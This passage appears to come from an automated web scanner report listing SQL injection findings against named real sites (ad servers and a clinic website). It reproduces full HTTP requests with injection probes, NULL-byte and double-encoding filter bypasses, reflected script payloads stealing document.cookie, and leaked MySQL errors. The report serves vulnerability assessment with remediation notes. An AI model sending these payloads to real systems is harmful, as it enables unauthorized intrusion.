Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:01:55 GMT
Server: Apache
P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _cc=G/SkJYTl4xB5DzWnjJsxKS7Ikiy5zkR+OaoC5I4yrnSj0IzYFdv/5xkL34IVVlNI21A6Tll5JhicLyDKsXHxiXt4czGm74ULKBQKIhvH/MR7vSf4QYfI2D5z9rB2Z3FWtfyCSbFkg+/5YfV1UiWFk065BW3/iEtfbUHQgfa9AKUmjhlaZ2g+R9ESfr/p556qQovpllZTUTJc0F++uYsY8Qk74sYaMk4USrbAjv+COiS68qoNWkMd/guT/ktJJLZK/zrOCBhqAsXvLRkFzPadj/K2xMcHN4dWHFZRV3BZrZ7bKC2RKEgmZiD+RwRBcENkbrDf3CJdWjceNmKAHA1/k22otNyfLQCaXrzBtVKb/Nbf1GV3oX1jQecjjMYUMcgxTopHYlTEQGKtzjJDEuSJES3gfiMRKJ/PD9kTDzerHB1s+qOnBw==.cHhmyQbUSBnRfZHEv3/FmA.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:01:55 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 19123

var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=open-with.pc-test.com,sparxsystems.c
...[SNIP]...

1.7. http://mm.chitika.net/minimall [output parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mm.chitika.net
Path:   /minimall

Issue detail

The output parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the output parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&ref=http%3A//burp/show/2&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=159&loc=205,1844&output=simplejs%00'&callback=ch_ad_render_search HTTP/1.1
Host: mm.chitika.net
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cc=G/SkJTIFoxB5zyrGvNoopWH98lzIGX09Lqf5eXifPARQKIeBMDE2hXiO2v2mk4qq+VP5P+m5J4eRJC5zWa+7Jf/jc6jkVmF/MbVWYaETxPD821XiL9JnE93XkPahPfrLgcfAbrpHrHNZJnEeObU3OtCTVkfYYH7KACiAKZU6LmYWAtjWSyuwX+GHPstuHx9zwtQHlMeOjOOZqdwl722uq28wErLf/s1odnEP3DQeHuP1taSO/8VINxZmUH3OCHKjzoEA3Ep2hvSi4fTUQ9xQg5HBigwFw6FcG4XjG/ZwAf++TM2bd6D6MDuMeCmjszjwKZD/DVxhbPa1zjGTdrpztnAx7H5aYU7Rqim51ZoqsIAq7yljuMQoFzxW0QdFZuKMR6dZIfdTULQZElAm9UvyESXU0bZ2j55Oz02Ty6P8x00eoqYu.JlGLkqSjkssYk0faKwa/ow.4

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:04:49 GMT
Server: Apache
P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _cc=G/Sk5qAFuhB59X9RSLW7ckHfTilfUr8ib+dgOlCrfN8tBICvndkUjF0Z+nHc1Lu4MJAEmuf7fLy0i4/wwCbQ43hc1E5Er3lpKWuO/mo+YDpjuTx8UIUKda73Ece3P1hlb0MyAv+2UILn776mpHuBjjtlJIkhqRnLQogXCoP6wqyg/QYisThsxwzalEcKONAJg6KntPTEiekOflooJTJsgje4dXFcK4GtVRgajUVRJhm6zbs8vkT3bFy7fNreAZbQsODCkNqyvvHTc94Y+NA959gf/JzitgbxCcNwVNfxNri8JxaY7PCzU5dyij/M3kpdjVBtH7+04yzwdOpkFzAIbk7QAbXG1n0fEjPpKQsDR6NlY3bvEorfyuWFdrnGpIZMd0Mxt80tQUktKfdRUkiIEoYWSGPR/VnmmZkRiG0ClYYOSGCk82bO8hxXVKcQqKWQpoX87MkSKH1vk6DJtibEwzhPf3oN3buTIaLqG8mMkFaxQi4eHZC8UhWRY40re9E=.DQ6LMm6rS5GiZpB+XsnH6g.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:04:49 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...
PVs1K%2FWWKWj4SRWLTkFgHujJpdV3XGBUvGGVmufLsEHrxN1BF2EdMXYmwkjrUFCb6pj6q7cCdZ4w2lI6oh8%2B3wzEBnV6r0jlsUnfMFgXF14JaLfo%3D&template=v1-450xauto">Your Free recommended download to fix Windows Vista and XP errors!<!--overture-->
...[SNIP]...

Request 2

GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&ref=http%3A//burp/show/2&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=159&loc=205,1844&output=simplejs%00''&callback=ch_ad_render_search HTTP/1.1
Host: mm.chitika.net
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cc=G/SkJTIFoxB5zyrGvNoopWH98lzIGX09Lqf5eXifPARQKIeBMDE2hXiO2v2mk4qq+VP5P+m5J4eRJC5zWa+7Jf/jc6jkVmF/MbVWYaETxPD821XiL9JnE93XkPahPfrLgcfAbrpHrHNZJnEeObU3OtCTVkfYYH7KACiAKZU6LmYWAtjWSyuwX+GHPstuHx9zwtQHlMeOjOOZqdwl722uq28wErLf/s1odnEP3DQeHuP1taSO/8VINxZmUH3OCHKjzoEA3Ep2hvSi4fTUQ9xQg5HBigwFw6FcG4XjG/ZwAf++TM2bd6D6MDuMeCmjszjwKZD/DVxhbPa1zjGTdrpztnAx7H5aYU7Rqim51ZoqsIAq7yljuMQoFzxW0QdFZuKMR6dZIfdTULQZElAm9UvyESXU0bZ2j55Oz02Ty6P8x00eoqYu.JlGLkqSjkssYk0faKwa/ow.4

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:04:49 GMT
Server: Apache
P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _cc=...[SNIP]....DQ6LMm6rS5GiZpB+XsnH6g.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:04:49 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.8. http://pubads.g.doubleclick.net/gampad/ads [flash parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The flash parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the flash parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /gampad/ads?correlator=1296999633346&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&a2ids=BI04A&cids=Urcrdg&pstok=VbbiuyNOfJsKDgoKCODpSBDY2_LWFBAA&client=ca-pub-1100161805080516&slotname=Tipd_300x250&page_slots=tipd-Others_sidebar_300x250%2CTipd_300x250&cookie=ID%3Dd7dc9664002f3c4e%3AT%3D1296999550%3AS%3DALNI_MZNjYniXih7H0A04asfHG6rtAHkcQ&ga_vid=1926595520.1296999588&ga_sid=1296999588&ga_hid=1013703234&ga_fc=true&url=http%3A%2F%2Ftipd.com%2Fregister&ref=http%3A%2F%2Ftipd.com%2F%3F6785a%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eea5c679a90c%3D1&lmt=1297021234&dt=1296999634578&cc=81&biw=1001&bih=1015&ifi=2&adk=3099318589&u_tz=-360&u_his=3&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.1.103'%20and%201%3d1--%20 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tipd.com/register
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 06 Feb 2011 13:52:27 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 2974

GA_googleSetAdContentsBySlotForSync({"Tipd_300x250":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\
...[SNIP]...
= c + t + r; } else {a.href += \"\x26clkt=\" + t;}}return true;}function cs(){window.status='';} function jcc(a) {pha=document.getElementById(a); nc=pha.href.indexOf('\x26jca='); if(nc\x3e=1) return; jca=(9507)-(226)-(558); if (a=='aw0') {jca+=(-2656);} else {jca=0;} phb=pha.href+'\x26jca='+jca; pha.href=phb;} function st(id) {var a = document.getElementById(id);if (a) {a.myt = (new Date()).getTime();}return true;}function ha(a){ su(a); jcc(a); }function ca(a) { su(a); jcc(a); top.location.href=document.getElementById(a).href;}function ga(o,e) {if (document.getElementById) {a=o.id.substring(1);p=\"\";r=\"\";g=e.target;if (g) {t=g.id;f=g.parentNode;if (f) {p=f.id;h=f.parentNode;if (h)r=h.id;}} else {h=e.srcElement;f=h.parentNode;if (f)p=f.id;t=h.id;}if (t==a||p==a||r==a)return true;su(a); jcc(a); top.location.href=document.getElementById(a).href;}}\x3c/script\x3e\x3ca id=\"aw0\" target=\"_top\" href=\"http://googleads.g.doubleclick.net/aclk?sa=l\x26ai=BTHHnm6dOTbqFD4yGlgfFoMSFCe3px-sBAAAAEAEgvca9DjgAUJeFyLD______wFYlYzK1xVgyYajh9SjgBCyAQh0aXBkLmNvbboBCjMwMHgyNTBfYXPIAQLaARhodHRwOi8vdGlwZC5jb20vcmVnaXN0ZXLgAQLAAgLgAgDqAgxUaXBkXzMwMHgyNTD4AvjRHoADAZAD6AKYA_ABqAMByAMV4AQB\x26num=0\x26sig=AGiWqtzjS3LqvtxHXPNaIwJ9eTNc2wsz4Q\x26client=ca-pub-1100161805080516\x26adurl=http://rydex-sgi.com/equalweight/\" onFocus=\"ss('','aw0')\" onMouseDown=\"st('aw0')\" onMouseOver=\"return ss('','aw0')\" onMouseOut=\"cs()\" onClick=\"ha('aw0')\"\x3e\x3cimg src=\"http://pagead2.googlesyndication.com/pagead/imgad?id=CKGT9_bGgJ-TexCsAhj6ATIINJM88i6QLlA\" border=\"0\" width=\"300\" height=\"250\"\x3e\x3c/a\x3e\x3c/body\x3e\x3c/html\x3e","_snippet_":false,"_height_":250,"_width_":300,"_empty_":false,"_is_afc_":false,"_is_psa_":false,"_is_3pas_":false,"_cids_":["VryhhU"],"_a2ids_":["CAmDQ"],"_pstok_":"moYbtblgPScKDgoKCODpSBDY2_LWFBAACg8KCwiNzIABEJWMytcVEAA"}});

Request 2

GET /gampad/ads?correlator=1296999633346&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&a2ids=BI04A&cids=Urcrdg&pstok=VbbiuyNOfJsKDgoKCODpSBDY2_LWFBAA&client=ca-pub-1100161805080516&slotname=Tipd_300x250&page_slots=tipd-Others_sidebar_300x250%2CTipd_300x250&cookie=ID%3Dd7dc9664002f3c4e%3AT%3D1296999550%3AS%3DALNI_MZNjYniXih7H0A04asfHG6rtAHkcQ&ga_vid=1926595520.1296999588&ga_sid=1296999588&ga_hid=1013703234&ga_fc=true&url=http%3A%2F%2Ftipd.com%2Fregister&ref=http%3A%2F%2Ftipd.com%2F%3F6785a%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eea5c679a90c%3D1&lmt=1297021234&dt=1296999634578&cc=81&biw=1001&bih=1015&ifi=2&adk=3099318589&u_tz=-360&u_his=3&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.1.103'%20and%201%3d2--%20 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tipd.com/register
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 06 Feb 2011 13:52:28 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 3045

GA_googleSetAdContentsBySlotForSync({"Tipd_300x250":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\
...[SNIP]...
= c + t + r; } else {a.href += \"\x26clkt=\" + t;}}return true;}function cs(){window.status='';} function jcc(a) {pha=document.getElementById(a); nc=pha.href.indexOf('\x26jca='); if(nc\x3e=1) return; sv=String.fromCharCode(55,57,49,54,57,53,56,57,53); sv=sv.slice(1,5); jca=(-4875)+parseInt(sv); if (a=='aw0') {jca+=(2350);} else {jca=0;} phb=pha.href+'\x26jca='+jca; pha.href=phb;} function st(id) {var a = document.getElementById(id);if (a) {a.myt = (new Date()).getTime();}return true;}function ha(a){ su(a); jcc(a); }function ca(a) { su(a); jcc(a); top.location.href=document.getElementById(a).href;}function ga(o,e) {if (document.getElementById) {a=o.id.substring(1);p=\"\";r=\"\";g=e.target;if (g) {t=g.id;f=g.parentNode;if (f) {p=f.id;h=f.parentNode;if (h)r=h.id;}} else {h=e.srcElement;f=h.parentNode;if (f)p=f.id;t=h.id;}if (t==a||p==a||r==a)return true;su(a); jcc(a); top.location.href=document.getElementById(a).href;}}\x3c/script\x3e\x3ca id=\"aw0\" target=\"_top\" href=\"http://googleads.g.doubleclick.net/aclk?sa=l\x26ai=BdkO2nKdOTaGyEur7lQfYuJSaA-3px-sBAAAAEAEgvca9DjgAUJeFyLD______wFYlYzK1xVgyYajh9SjgBCyAQh0aXBkLmNvbboBCjMwMHgyNTBfYXPIAQLaARhodHRwOi8vdGlwZC5jb20vcmVnaXN0ZXLgAQLAAgLgAgDqAgxUaXBkXzMwMHgyNTD4AvjRHoADAZAD6AKYA_ABqAMByAMV4AQB\x26num=0\x26sig=AGiWqtwm2_nbgUzu0V6hHIJj95ks7G-P4A\x26client=ca-pub-1100161805080516\x26adurl=http://rydex-sgi.com/equalweight/\" onFocus=\"ss('','aw0')\" onMouseDown=\"st('aw0')\" onMouseOver=\"return ss('','aw0')\" onMouseOut=\"cs()\" onClick=\"ha('aw0')\"\x3e\x3cimg src=\"http://pagead2.googlesyndication.com/pagead/imgad?id=CKGT9_bGgJ-TexCsAhj6ATIINJM88i6QLlA\" border=\"0\" width=\"300\" height=\"250\"\x3e\x3c/a\x3e\x3c/body\x3e\x3c/html\x3e","_snippet_":false,"_height_":250,"_width_":300,"_empty_":false,"_is_afc_":false,"_is_psa_":false,"_is_3pas_":false,"_cids_":["VryhhU"],"_a2ids_":["CAmDQ"],"_pstok_":"moYbtblgPScKDgoKCODpSBDY2_LWFBAACg8KCwiNzIABEJWMytcVEAA"}});

1.9. http://redacted/FXM/iview/211419853/direct [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://redacted
Path:   /FXM/iview/211419853/direct

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /FXM/iview/211419853/direct;wi.125;hi.125/01?click= HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6126
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 06 Feb 2011 16:31:57 GMT

<html><head><title>010016_125x125</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;" bgcol
...[SNIP]...
<SCR' + 'IPT LANGUAGE=VBScript\>');
document.writeln('on error resume next');
document.writeln('Set oFlashPlayer = CreateObject("ShockwaveFlash.ShockwaveFlash." & nRequiredVersion)');
document.writeln('If IsObject(oFlashPlayer) Then');
document.writeln('bIsRig
...[SNIP]...

Request 2

GET /FXM/iview/211419853/direct;wi.125;hi.125/01?click= HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13%2527%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 240
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 06 Feb 2011 16:31:57 GMT

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/152669141/211419853/direct;wi.125;hi.125/01" onclick="(new Image).src='http://t.redcated'"><img src="http://ec.redcated/b/FX
...[SNIP]...

1.10. http://www.baysideeyes.com.au/aboutus.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /aboutus.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /aboutus.htm' HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:47 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 209

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''aboutus.htm'')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /aboutus.htm'' HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:47 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.11. http://www.baysideeyes.com.au/aboutus.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /aboutus.htm

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /aboutus.htm?1'=1 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:34 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 196

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /aboutus.htm?1''=1 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:37 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.12. http://www.baysideeyes.com.au/cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /cmsAdmin'/uploads/BLEPHARITIS.pdf&s=204.93 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 21:53:16 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 196

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /cmsAdmin''/uploads/BLEPHARITIS.pdf&s=204.93 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 21:53:16 GMT
